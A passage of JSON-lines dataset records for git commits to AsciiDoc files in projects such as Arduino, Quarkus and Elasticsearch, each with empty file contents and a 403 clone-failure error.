documentation\n","repos":"paulcwarren\/spring-content,paulcwarren\/spring-content,paulcwarren\/spring-content","old_file":"spring-content-solr\/src\/main\/asciidoc\/solr-search.adoc","new_file":"spring-content-solr\/src\/main\/asciidoc\/solr-search.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/paulcwarren\/spring-content.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e544891718a5e5e99ef5892fc09b85fc5b55f782","subject":"Update manpage.adoc","message":"Update manpage.adoc","repos":"steamboating\/Arduino,ricklon\/Arduino,henningpohl\/Arduino,lukeWal\/Arduino,me-no-dev\/Arduino-1,jabezGit\/Arduino,laylthe\/Arduino,bsmr-arduino\/Arduino,majenkotech\/Arduino,gestrem\/Arduino,byran\/Arduino,acosinwork\/Arduino,andyvand\/Arduino-1,ashwin713\/Arduino,ntruchsess\/Arduino-1,HCastano\/Arduino,niggor\/Arduino_cc,byran\/Arduino,zederson\/Arduino,gestrem\/Arduino,NaSymbol\/Arduino,ForestNymph\/Arduino_sources,jmgonzalez00449\/Arduino,KlaasDeNys\/Arduino,ikbelkirasan\/Arduino,jabezGit\/Arduino,talhaburak\/Arduino,bigjosh\/Arduino,niggor\/Arduino_cc,eddyst\/Arduino-SourceCode,KlaasDeNys\/Arduino,KlaasDeNys\/Arduino,eduardocasarin\/Arduino,vbextreme\/Arduino,lulufei\/Arduino,tomkrus007\/Arduino,tbowmo\/Arduino,jamesrob4\/Arduino,garci66\/Arduino,niggor\/Arduino_cc,karlitxo\/Arduino,snargledorf\/Arduino,superboonie\/Arduino,pdNor\/Arduino,xxxajk\/Arduino-1,tomkrus007\/Arduino,ForestNymph\/Arduino_sources,tomkrus007\/Arduino,jaimemaretoli\/Arduino,ashwin713\/Arduino,eduardocasarin\/Arduino,majenkotech\/Arduino,majenkotech\/Arduino,shannonshsu\/Arduino,laylthe\/Arduino,bigjosh\/Arduino,tommyli2014\/Arduino,zaiexx\/Arduino,vbextreme\/Arduino,stevemayhew\/Arduino,jamesrob4\/Arduino,henningpohl\/Arduino,vbextreme\/Arduino,wilhelmryan\/Arduino,lulufei\/Arduino,cscenter\/Arduino,onovy\/Arduino,steamboating\/Arduino,NaSymbol\/Arduino,henningpohl\/Arduino,ThoughtWorksIoTGurgaon\/Arduino,ccoenen\/Arduino,lulufei\/Arduino,ikbelkirasan\/Arduino,tbowmo\/Arduino,ari-analytics\/Arduino,garci66\/Arduino,Gourav2906\/Arduino,ThoughtWorksIoTGurgaon\/Arduino,NaSymbol\/Arduino,pdNor\/Arduino,superboonie\/Arduino,stickbreaker\/Arduino,eduardocasarin\/Arduino,ThoughtWorksIoTGurgaon\/Arduino,talhaburak\/Arduino,vbextreme\/Arduino,henningpohl\/Arduino,gberl001\/Arduino,andyvand\/Arduino-1,NicoHood\/Arduino,bigjosh\/Arduino,wilhelmryan\/Arduino,tommyli2014\/Arduino,wayoda\/Arduino,ogferreiro\/Arduino,stevemayhew\/Arduino,stevemayhew\/Arduino,tomkrus007\/Arduino,chaveiro\/Arduino,cscenter\/Arduino,shannonshsu\/Arduino,bigjosh\/Arduino,tomkrus007\/Arduino,laylthe\/Arduino,nandojve\/Arduino,kidswong999\/Arduino,wilhelmryan\/Arduino,arunkuttiyara\/Arduino,vbextreme\/Arduino,ari-analytics\/Arduino,NicoHood\/Arduino,stickbreaker\/Arduino,gestrem\/Arduino,ogferreiro\/Arduino,ccoenen\/Arduino,Chris--A\/Arduino,tommyli2014\/Arduino,niggor\/Arduino_cc,ashwin713\/Arduino,nandojve\/Arduino,jamesrob4\/Arduino,eggfly\/arduino,adamkh\/Arduino,xxxajk\/Arduino-1,laylthe\/Arduino,chaveiro\/Arduino,KlaasDeNys\/Arduino,ashwin713\/Arduino,shannonshsu\/Arduino,eddyst\/Arduino-SourceCode,bsmr-arduino\/Arduino,Gourav2906\/Arduino,ForestNymph\/Arduino_sources,eddyst\/Arduino-SourceCode,bsmr-arduino\/Arduino,gberl001\/Arduino,jaimemaretoli\/Arduino,zaiexx\/Arduino,ForestNymph\/Arduino_sources,cscenter\/Arduino,ricklon\/Arduino,arunkuttiyara\/Arduino,PeterVH\/Arduino,jabezGit\/Arduino,superboonie\/Arduino,ogferreiro\/Arduino,PaoloP74\/Ard
uino,lukeWal\/Arduino,onovy\/Arduino,arunkuttiyara\/Arduino,karlitxo\/Arduino,ogferreiro\/Arduino,bsmr-arduino\/Arduino,snargledorf\/Arduino,NicoHood\/Arduino,ntruchsess\/Arduino-1,NaSymbol\/Arduino,snargledorf\/Arduino,kidswong999\/Arduino,zaiexx\/Arduino,cscenter\/Arduino,stickbreaker\/Arduino,ashwin713\/Arduino,ashwin713\/Arduino,zaiexx\/Arduino,pdNor\/Arduino,superboonie\/Arduino,nandojve\/Arduino,lukeWal\/Arduino,andyvand\/Arduino-1,jamesrob4\/Arduino,eduardocasarin\/Arduino,me-no-dev\/Arduino-1,PeterVH\/Arduino,ForestNymph\/Arduino_sources,PaoloP74\/Arduino,eddyst\/Arduino-SourceCode,shannonshsu\/Arduino,steamboating\/Arduino,jmgonzalez00449\/Arduino,jmgonzalez00449\/Arduino,eggfly\/arduino,garci66\/Arduino,eggfly\/arduino,Chris--A\/Arduino,NaSymbol\/Arduino,jaimemaretoli\/Arduino,kidswong999\/Arduino,tskurauskas\/Arduino,xxxajk\/Arduino-1,ikbelkirasan\/Arduino,lukeWal\/Arduino,jmgonzalez00449\/Arduino,ccoenen\/Arduino,KlaasDeNys\/Arduino,steamboating\/Arduino,jabezGit\/Arduino,tomkrus007\/Arduino,zederson\/Arduino,ari-analytics\/Arduino,ricklon\/Arduino,wilhelmryan\/Arduino,arunkuttiyara\/Arduino,adamkh\/Arduino,karlitxo\/Arduino,garci66\/Arduino,lukeWal\/Arduino,eddyst\/Arduino-SourceCode,tomkrus007\/Arduino,shannonshsu\/Arduino,niggor\/Arduino_cc,KlaasDeNys\/Arduino,henningpohl\/Arduino,Gourav2906\/Arduino,jabezGit\/Arduino,stevemayhew\/Arduino,jaimemaretoli\/Arduino,vbextreme\/Arduino,chaveiro\/Arduino,ccoenen\/Arduino,talhaburak\/Arduino,pdNor\/Arduino,nandojve\/Arduino,zaiexx\/Arduino,jabezGit\/Arduino,zederson\/Arduino,jmgonzalez00449\/Arduino,majenkotech\/Arduino,pdNor\/Arduino,stickbreaker\/Arduino,nandojve\/Arduino,Chris--A\/Arduino,xxxajk\/Arduino-1,garci66\/Arduino,kidswong999\/Arduino,ThoughtWorksIoTGurgaon\/Arduino,KlaasDeNys\/Arduino,wayoda\/Arduino,NicoHood\/Arduino,eggfly\/arduino,karlitxo\/Arduino,talhaburak\/Arduino,eddyst\/Arduino-SourceCode,stevemayhew\/Arduino,henningpohl\/Arduino,niggor\/Arduino_cc,me-no-dev\/Arduino-1,ikbelkirasan\/Arduino,vbextreme\/Arduino,ogferreiro\/Arduino,eggfly\/arduino,xxxajk\/Arduino-1,Gourav2906\/Arduino,steamboating\/Arduino,Chris--A\/Arduino,jmgonzalez00449\/Arduino,onovy\/Arduino,kidswong999\/Arduino,HCastano\/Arduino,onovy\/Arduino,byran\/Arduino,chaveiro\/Arduino,ikbelkirasan\/Arduino,HCastano\/Arduino,adamkh\/Arduino,tommyli2014\/Arduino,ThoughtWorksIoTGurgaon\/Arduino,eduardocasarin\/Arduino,zederson\/Arduino,arunkuttiyara\/Arduino,adamkh\/Arduino,superboonie\/Arduino,Gourav2906\/Arduino,onovy\/Arduino,ntruchsess\/Arduino-1,PaoloP74\/Arduino,eduardocasarin\/Arduino,PaoloP74\/Arduino,ari-analytics\/Arduino,Chris--A\/Arduino,gberl001\/Arduino,PaoloP74\/Arduino,onovy\/Arduino,cscenter\/Arduino,xxxajk\/Arduino-1,ari-analytics\/Arduino,karlitxo\/Arduino,talhaburak\/Arduino,zederson\/Arduino,shannonshsu\/Arduino,HCastano\/Arduino,xxxajk\/Arduino-1,nandojve\/Arduino,gestrem\/Arduino,andyvand\/Arduino-1,kidswong999\/Arduino,shannonshsu\/Arduino,KlaasDeNys\/Arduino,majenkotech\/Arduino,wayoda\/Arduino,NicoHood\/Arduino,majenkotech\/Arduino,laylthe\/Arduino,ari-analytics\/Arduino,steamboating\/Arduino,gberl001\/Arduino,ricklon\/Arduino,lulufei\/Arduino,henningpohl\/Arduino,NicoHood\/Arduino,jmgonzalez00449\/Arduino,snargledorf\/Arduino,byran\/Arduino,wayoda\/Arduino,ogferreiro\/Arduino,tskurauskas\/Arduino,lulufei\/Arduino,tomkrus007\/Arduino,me-no-dev\/Arduino-1,acosinwork\/Arduino,zederson\/Arduino,tbowmo\/Arduino,ntruchsess\/Arduino-1,lukeWal\/Arduino,pdNor\/Arduino,snargledorf\/Arduino,wilhelmryan\/Arduino,stickbreaker\/Arduino,Peter
VH\/Arduino,Chris--A\/Arduino,snargledorf\/Arduino,wayoda\/Arduino,garci66\/Arduino,adamkh\/Arduino,tskurauskas\/Arduino,jamesrob4\/Arduino,stickbreaker\/Arduino,wayoda\/Arduino,acosinwork\/Arduino,eddyst\/Arduino-SourceCode,tbowmo\/Arduino,superboonie\/Arduino,tbowmo\/Arduino,pdNor\/Arduino,andyvand\/Arduino-1,wilhelmryan\/Arduino,ntruchsess\/Arduino-1,chaveiro\/Arduino,majenkotech\/Arduino,andyvand\/Arduino-1,tbowmo\/Arduino,NaSymbol\/Arduino,garci66\/Arduino,Chris--A\/Arduino,ogferreiro\/Arduino,karlitxo\/Arduino,stevemayhew\/Arduino,tommyli2014\/Arduino,acosinwork\/Arduino,PeterVH\/Arduino,PaoloP74\/Arduino,superboonie\/Arduino,bigjosh\/Arduino,ThoughtWorksIoTGurgaon\/Arduino,chaveiro\/Arduino,stickbreaker\/Arduino,wilhelmryan\/Arduino,jamesrob4\/Arduino,xxxajk\/Arduino-1,ForestNymph\/Arduino_sources,tskurauskas\/Arduino,chaveiro\/Arduino,wayoda\/Arduino,chaveiro\/Arduino,arunkuttiyara\/Arduino,ashwin713\/Arduino,ricklon\/Arduino,me-no-dev\/Arduino-1,adamkh\/Arduino,jamesrob4\/Arduino,snargledorf\/Arduino,zaiexx\/Arduino,ikbelkirasan\/Arduino,HCastano\/Arduino,adamkh\/Arduino,tskurauskas\/Arduino,jaimemaretoli\/Arduino,talhaburak\/Arduino,lulufei\/Arduino,ThoughtWorksIoTGurgaon\/Arduino,kidswong999\/Arduino,jaimemaretoli\/Arduino,zaiexx\/Arduino,ashwin713\/Arduino,cscenter\/Arduino,jabezGit\/Arduino,bsmr-arduino\/Arduino,tommyli2014\/Arduino,gberl001\/Arduino,eggfly\/arduino,me-no-dev\/Arduino-1,eggfly\/arduino,cscenter\/Arduino,eduardocasarin\/Arduino,ricklon\/Arduino,Chris--A\/Arduino,onovy\/Arduino,gberl001\/Arduino,stevemayhew\/Arduino,jaimemaretoli\/Arduino,stevemayhew\/Arduino,ccoenen\/Arduino,ari-analytics\/Arduino,niggor\/Arduino_cc,PeterVH\/Arduino,ccoenen\/Arduino,PeterVH\/Arduino,NicoHood\/Arduino,bsmr-arduino\/Arduino,tbowmo\/Arduino,jaimemaretoli\/Arduino,zaiexx\/Arduino,Gourav2906\/Arduino,laylthe\/Arduino,NicoHood\/Arduino,me-no-dev\/Arduino-1,ccoenen\/Arduino,gestrem\/Arduino,NaSymbol\/Arduino,kidswong999\/Arduino,lukeWal\/Arduino,adamkh\/Arduino,superboonie\/Arduino,bigjosh\/Arduino,shannonshsu\/Arduino,ntruchsess\/Arduino-1,tskurauskas\/Arduino,pdNor\/Arduino,NaSymbol\/Arduino,byran\/Arduino,vbextreme\/Arduino,HCastano\/Arduino,bigjosh\/Arduino,bsmr-arduino\/Arduino,gestrem\/Arduino,garci66\/Arduino,PeterVH\/Arduino,henningpohl\/Arduino,Gourav2906\/Arduino,acosinwork\/Arduino,tbowmo\/Arduino,niggor\/Arduino_cc,laylthe\/Arduino,steamboating\/Arduino,Gourav2906\/Arduino,niggor\/Arduino_cc,nandojve\/Arduino,eddyst\/Arduino-SourceCode,andyvand\/Arduino-1,me-no-dev\/Arduino-1,eggfly\/arduino,byran\/Arduino,bsmr-arduino\/Arduino,arunkuttiyara\/Arduino,tommyli2014\/Arduino,PeterVH\/Arduino,tskurauskas\/Arduino,talhaburak\/Arduino,ari-analytics\/Arduino,jabezGit\/Arduino,ccoenen\/Arduino,bigjosh\/Arduino,byran\/Arduino,nandojve\/Arduino,acosinwork\/Arduino,gestrem\/Arduino,ntruchsess\/Arduino-1,PaoloP74\/Arduino,wayoda\/Arduino,ricklon\/Arduino,tskurauskas\/Arduino,acosinwork\/Arduino,HCastano\/Arduino,gberl001\/Arduino,cscenter\/Arduino,jmgonzalez00449\/Arduino,ThoughtWorksIoTGurgaon\/Arduino,zederson\/Arduino,ntruchsess\/Arduino-1,acosinwork\/Arduino,byran\/Arduino,ikbelkirasan\/Arduino,PaoloP74\/Arduino,karlitxo\/Arduino,talhaburak\/Arduino,ikbelkirasan\/Arduino,lulufei\/Arduino,lukeWal\/Arduino,ForestNymph\/Arduino_sources,HCastano\/Arduino","old_file":"build\/shared\/manpage.adoc","new_file":"build\/shared\/manpage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ikbelkirasan\/Arduino.git\/': The 
requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"c3a117df7ea47c411fa6c16cd8cdb31759c81e86","subject":"CL - other interesting piece","message":"CL - other interesting piece\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"2d50d1fd8617b5e1ff91d982dd1df016eace1a16","subject":"Publish 2016-6-26-PHPER-H5-base64-base64.adoc","message":"Publish 2016-6-26-PHPER-H5-base64-base64.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-26-PHPER-H5-base64-base64.adoc","new_file":"2016-6-26-PHPER-H5-base64-base64.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b1194d730c6f7f51e26e92fa64fdee5683f7fbab","subject":"updating brief abstract","message":"updating brief abstract\n","repos":"couchbaselabs\/Workshop,couchbaselabs\/Workshop,couchbaselabs\/Workshop","old_file":"connect2016\/developer\/README.adoc","new_file":"connect2016\/developer\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/couchbaselabs\/Workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0468b049fc0fed423c3ae9317a472b8213103c09","subject":"Add ClojuTRE 2018","message":"Add ClojuTRE 2018\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2018\/clojutre.adoc","new_file":"content\/events\/2018\/clojutre.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"3c79d0f24d046bba46b4e9a306ba90123f334530","subject":"Updating readme.asciidoc with more example information, more thorough TileMap feature exploration.","message":"Updating readme.asciidoc with more example information, more thorough TileMap feature exploration.\n","repos":"lillian-lemmer\/hypatia,hypatia-software-org\/hypatia-engine,hypatia-software-org\/hypatia-engine,brechin\/hypatia,Applemann\/hypatia,lillian-lemmer\/hypatia,brechin\/hypatia,Applemann\/hypatia","old_file":"readme.asciidoc","new_file":"readme.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lillian-lemmer\/hypatia.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"111acbbb864bc7480d572ac212cfcf69e3a04c54","subject":"Update 2016-11-07-070000-Sunday-Night-Dream.adoc","message":"Update 2016-11-07-070000-Sunday-Night-Dream.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-07-070000-Sunday-Night-Dream.adoc","new_file":"_posts\/2016-11-07-070000-Sunday-Night-Dream.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL 
returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e5463b3349d35a5a90f11d99e3d5d1aa8f92a5a6","subject":"Update 2016-02-05-XQuery-snippets.adoc","message":"Update 2016-02-05-XQuery-snippets.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-02-05-XQuery-snippets.adoc","new_file":"_posts\/2016-02-05-XQuery-snippets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5fbbaa0440ad8bb8cdfd21439286ee392b43f16","subject":"Update 1993-11-17.adoc","message":"Update 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-11-17.adoc","new_file":"_posts\/1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"561ef33915e5c43dba2dfb5e2b5ecd30d3655683","subject":"Update 2019-03-12-A-B.adoc","message":"Update 2019-03-12-A-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B.adoc","new_file":"_posts\/2019-03-12-A-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c124cfbfe8e596e2d1e1363f91a4b3342394360","subject":"Add docs for Kubernetes Config extension","message":"Add docs for Kubernetes Config extension\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/kubernetes-config.adoc","new_file":"docs\/src\/main\/asciidoc\/kubernetes-config.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4b7273d38396f6c447c976f13e21b6b2442609ce","subject":"Update 2013-04-01-SINUS-SP-LATTITUDE-64-2006.adoc","message":"Update 2013-04-01-SINUS-SP-LATTITUDE-64-2006.adoc","repos":"discimport\/blog.discimport.dk,discimport\/blog.discimport.dk,discimport\/blog.discimport.dk,discimport\/blog.discimport.dk","old_file":"_posts\/2013-04-01-SINUS-SP-LATTITUDE-64-2006.adoc","new_file":"_posts\/2013-04-01-SINUS-SP-LATTITUDE-64-2006.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/discimport\/blog.discimport.dk.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5228b20817b0bdf4bda9fd08d239c04d6ddcfa2a","subject":"y2b create post WTF is a Jumping Sumo?","message":"y2b create post WTF is a Jumping 
Sumo?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-08-03-WTF-is-a-Jumping-Sumo.adoc","new_file":"_posts\/2015-08-03-WTF-is-a-Jumping-Sumo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d11d6c9b5d5591103e72da5c140973549111eb4c","subject":"style(overview): fix typo","message":"style(overview): fix typo\n","repos":"xifeiwu\/promises-book,tangjinzhou\/promises-book,azu\/promises-book,tangjinzhou\/promises-book,liubin\/promises-book,cqricky\/promises-book,cqricky\/promises-book,mzbac\/promises-book,purepennons\/promises-book,xifeiwu\/promises-book,wangwei1237\/promises-book,wangwei1237\/promises-book,wenber\/promises-book,azu\/promises-book,azu\/promises-book,genie88\/promises-book,genie88\/promises-book,genie88\/promises-book,lidasong2014\/promises-book,cqricky\/promises-book,dieface\/promises-book,dieface\/promises-book,charlenopires\/promises-book,lidasong2014\/promises-book,liyunsheng\/promises-book,oToUC\/promises-book,wenber\/promises-book,mzbac\/promises-book,tangjinzhou\/promises-book,charlenopires\/promises-book,oToUC\/promises-book,purepennons\/promises-book,mzbac\/promises-book,liyunsheng\/promises-book,liubin\/promises-book,purepennons\/promises-book,xifeiwu\/promises-book,liyunsheng\/promises-book,wenber\/promises-book,wangwei1237\/promises-book,sunfurong\/promise,charlenopires\/promises-book,liubin\/promises-book,oToUC\/promises-book,sunfurong\/promise,dieface\/promises-book,sunfurong\/promise,azu\/promises-book,lidasong2014\/promises-book","old_file":"Ch1_WhatsPromises\/promise-overview.adoc","new_file":"Ch1_WhatsPromises\/promise-overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mzbac\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0bf83f897ba53d93c52df91d8ed4381c27f68080","subject":"fix(onrejected-or-catch): NOTE\u30c7\u30a3\u30ec\u30af\u30c6\u30a3\u30d6\u306e\u4fee\u6b63","message":"fix(onrejected-or-catch): 
NOTE\u30c7\u30a3\u30ec\u30af\u30c6\u30a3\u30d6\u306e\u4fee\u6b63\n","repos":"sunfurong\/promise,xifeiwu\/promises-book,mzbac\/promises-book,oToUC\/promises-book,wangwei1237\/promises-book,dieface\/promises-book,tangjinzhou\/promises-book,cqricky\/promises-book,purepennons\/promises-book,wenber\/promises-book,lidasong2014\/promises-book,dieface\/promises-book,liubin\/promises-book,charlenopires\/promises-book,tangjinzhou\/promises-book,wangwei1237\/promises-book,azu\/promises-book,cqricky\/promises-book,lidasong2014\/promises-book,oToUC\/promises-book,liyunsheng\/promises-book,azu\/promises-book,oToUC\/promises-book,liubin\/promises-book,cqricky\/promises-book,azu\/promises-book,genie88\/promises-book,purepennons\/promises-book,xifeiwu\/promises-book,charlenopires\/promises-book,mzbac\/promises-book,tangjinzhou\/promises-book,mzbac\/promises-book,purepennons\/promises-book,genie88\/promises-book,liyunsheng\/promises-book,dieface\/promises-book,sunfurong\/promise,wangwei1237\/promises-book,wenber\/promises-book,charlenopires\/promises-book,lidasong2014\/promises-book,xifeiwu\/promises-book,genie88\/promises-book,sunfurong\/promise,liubin\/promises-book,liyunsheng\/promises-book,wenber\/promises-book,azu\/promises-book","old_file":"Ch2_HowToWrite\/onrejected-or-catch.adoc","new_file":"Ch2_HowToWrite\/onrejected-or-catch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mzbac\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b7697f9750621683cfb244f4625bdb70c625d3ed","subject":"Fixed #3 Added the table of contents on the right of the HTML page","message":"Fixed #3 Added the table of contents on the right of the HTML page\n","repos":"uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis","old_file":"doc\/development\/software-process.adoc","new_file":"doc\/development\/software-process.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"086b8db7be262c7ca72dcc1e619a381d55e08463","subject":"Update 2009-04-15-Hello-Java-world.adoc","message":"Update 2009-04-15-Hello-Java-world.adoc","repos":"javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io","old_file":"_posts\/2009-04-15-Hello-Java-world.adoc","new_file":"_posts\/2009-04-15-Hello-Java-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/javathought\/javathought.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fbcf04ebe1dee4ad260d28d9434cb18d6982949f","subject":"Update 2017-03-22-Defer-to-Promise.adoc","message":"Update 2017-03-22-Defer-to-Promise.adoc","repos":"ioisup\/ioisup.github.io,ioisup\/ioisup.github.io,ioisup\/ioisup.github.io,ioisup\/ioisup.github.io","old_file":"_posts\/2017-03-22-Defer-to-Promise.adoc","new_file":"_posts\/2017-03-22-Defer-to-Promise.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ioisup\/ioisup.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"5d6ee7e82ea369c60b356aa7875e6d00e69f73f4","subject":"Docs: Update integration tests documentation","message":"Docs: Update integration tests documentation\n","repos":"sreeramjayan\/elasticsearch,MetSystem\/elasticsearch,scottsom\/elasticsearch,btiernay\/elasticsearch,rlugojr\/elasticsearch,himanshuag\/elasticsearch,jprante\/elasticsearch,kunallimaye\/elasticsearch,infusionsoft\/elasticsearch,nazarewk\/elasticsearch,umeshdangat\/elasticsearch,masterweb121\/elasticsearch,strapdata\/elassandra5-rc,tebriel\/elasticsearch,clintongormley\/elasticsearch,sc0ttkclark\/elasticsearch,andrestc\/elasticsearch,xingguang2013\/elasticsearch,bestwpw\/elasticsearch,andrejserafim\/elasticsearch,brandonkearby\/elasticsearch,xingguang2013\/elasticsearch,F0lha\/elasticsearch,caengcjd\/elasticsearch,rhoml\/elasticsearch,wenpos\/elasticsearch,i-am-Nathan\/elasticsearch,uschindler\/elasticsearch,pozhidaevak\/elasticsearch,snikch\/elasticsearch,lydonchandra\/elasticsearch,jprante\/elasticsearch,KimTaehee\/elasticsearch,MaineC\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,nknize\/elasticsearch,petabytedata\/elasticsearch,masterweb121\/elasticsearch,ricardocerq\/elasticsearch,masterweb121\/elasticsearch,mbrukman\/elasticsearch,rlugojr\/elasticsearch,episerver\/elasticsearch,camilojd\/elasticsearch,martinstuga\/elasticsearch,jbertouch\/elasticsearch,mmaracic\/elasticsearch,tebriel\/elasticsearch,markwalkom\/elasticsearch,springning\/elasticsearch,fred84\/elasticsearch,sreeramjayan\/elasticsearch,geidies\/elasticsearch,btiernay\/elasticsearch,ulkas\/elasticsearch,njlawton\/elasticsearch,nomoa\/elasticsearch,camilojd\/elasticsearch,GlenRSmith\/elasticsearch,mcku\/elasticsearch,avikurapati\/elasticsearch,LeoYao\/elasticsearch,vietlq\/elasticsearch,nomoa\/elasticsearch,a2lin\/elasticsearch,rmuir\/elasticsearch,mm0\/elasticsearch,F0lha\/elasticsearch,s1monw\/elasticsearch,sdauletau\/elasticsearch,KimTaehee\/elasticsearch,fforbeck\/elasticsearch,adrianbk\/elasticsearch,Ansh90\/elasticsearch,ouyangkongtong\/elasticsearch,StefanGor\/elasticsearch,mm0\/elasticsearch,andrestc\/elasticsearch,mjason3\/elasticsearch,wangtuo\/elasticsearch,btiernay\/elasticsearch,masaruh\/elasticsearch,awislowski\/elasticsearch,maddin2016\/elasticsearch,achow\/elasticsearch,JervyShi\/elasticsearch,kaneshin\/elasticsearch,yongminxia\/elasticsearch,elancom\/elasticsearch,caengcjd\/elasticsearch,awislowski\/elasticsearch,polyfractal\/elasticsearch,MisterAndersen\/elasticsearch,yynil\/elasticsearch,wbowling\/elasticsearch,fernandozhu\/elasticsearch,jeteve\/elasticsearch,AndreKR\/elasticsearch,lydonchandra\/elasticsearch,weipinghe\/elasticsearch,lks21c\/elasticsearch,strapdata\/elassandra5-rc,diendt\/elasticsearch,Uiho\/elasticsearch,IanvsPoplicola\/elasticsearch,sreeramjayan\/elasticsearch,zkidkid\/elasticsearch,vietlq\/elasticsearch,nellicus\/elasticsearch,mortonsykes\/elasticsearch,mgalushka\/elasticsearch,jpountz\/elasticsearch,petabytedata\/elasticsearch,wuranbo\/elasticsearch,vietlq\/elasticsearch,xuzha\/elasticsearch,xuzha\/elasticsearch,mapr\/elasticsearch,ricardocerq\/elasticsearch,cnfire\/elasticsearch-1,elasticdog\/elasticsearch,elasticdog\/elasticsearch,MaineC\/elasticsearch,Uiho\/elasticsearch,AndreKR\/elasticsearch,wenpos\/elasticsearch,KimTaehee\/elasticsearch,dongjoon-hyun\/elasticsearch,mbrukman\/elasticsearch,andrestc\/elasticsearch,davidvgalbraith\/elasticsearch,lzo\/elasticsearch-1,IanvsPoplicola\/elasticsearch,nazarewk\/elasticsearch,qwerty4030\/elasticsearch,LewayneNaidoo\/elasticsearch,wangtuo\/elasticsearch